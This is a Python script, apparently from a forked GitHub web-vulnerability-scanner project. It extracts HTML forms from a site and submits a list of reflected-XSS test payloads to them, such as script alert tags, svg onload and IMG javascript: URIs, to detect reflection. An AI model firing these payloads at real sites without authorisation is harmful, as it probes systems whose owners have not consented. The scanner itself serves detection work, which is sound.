forked from Repozo/Web-Vulnerability-Scanner
-
Notifications
You must be signed in to change notification settings - Fork 0
/
xssscan.py
82 lines (73 loc) · 2.82 KB
/
xssscan.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
import requests
from pprint import pprint
from bs4 import BeautifulSoup as bsoup
from urllib.parse import urljoin
def extract_all_forms(url):
"""It returns all the forms from a given url"""
soup = bsoup(requests.get(url).content, "html.parser")
return soup.find_all("form")
def extract_form_details(form):
"""
To extract all possible information from a html form
"""
details = {}
# extract the form action
try:
action = form.attrs.get("action").lower()
except:
action = ""
# extract the form method e.g GET,POST etc
method = form.attrs.get("method", "get").lower()
# extract all the input details such as type and name
inputs = []
for input_tag in form.find_all("input"):
input_type = input_tag.attrs.get("type", "text")
input_name = input_tag.attrs.get("name")
inputs.append({"type": input_type, "name": input_name})
# store details in the resulting dictionary
details["action"] = action
details["method"] = method
details["inputs"] = inputs
return details
def submit_form(formDetails, url, value):
"""
Submits a form given in `formDetails`
formDetails is a dictionary that contain form information
value -> this will be replaced to all text and search inputs
It will return the HTTP response
"""
# complete the url
targetUrl = urljoin(url, formDetails["action"])
# get the inputs
inputs = formDetails["inputs"]
data = {}
for input in inputs:
# replace text to search values with `value`
if input["type"] == "text" or input["type"] == "search":
input["value"] = value
input_name = input.get("name")
input_value = input.get("value")
if input_name and input_value:
data[input_name] = input_value
if formDetails["method"] == "post":
return requests.post(targetUrl, data=data)
else:
return requests.get(targetUrl, params=data)
def check_xss(url):
"""
returns all xss vulnerable in a given URL
"""
#extract forms from the url
url="https://www."+url
forms = extract_all_forms(url)
xss_payloads = ["<script>alert('hi')</scripT>", "<IMG SRC=JaVaScRiPt:alert('XSS')>", "<BODY BACKGROUND=\"javascript:alert('XSS')\">", "<svg/onload=alert('XSS')>", "<DIV STYLE=\"width: expression(alert('XSS'));\">", "<audio src/onerror=alert(1)>"]
# flag value
is_vulnerable = "0"
# iterate over all forms
for form in forms:
formDetails = extract_form_details(form)
for xss_payload in xss_payloads:
content = submit_form(formDetails, url, xss_payload).content.decode()
if xss_payload in content:
return formDetails
return is_vulnerable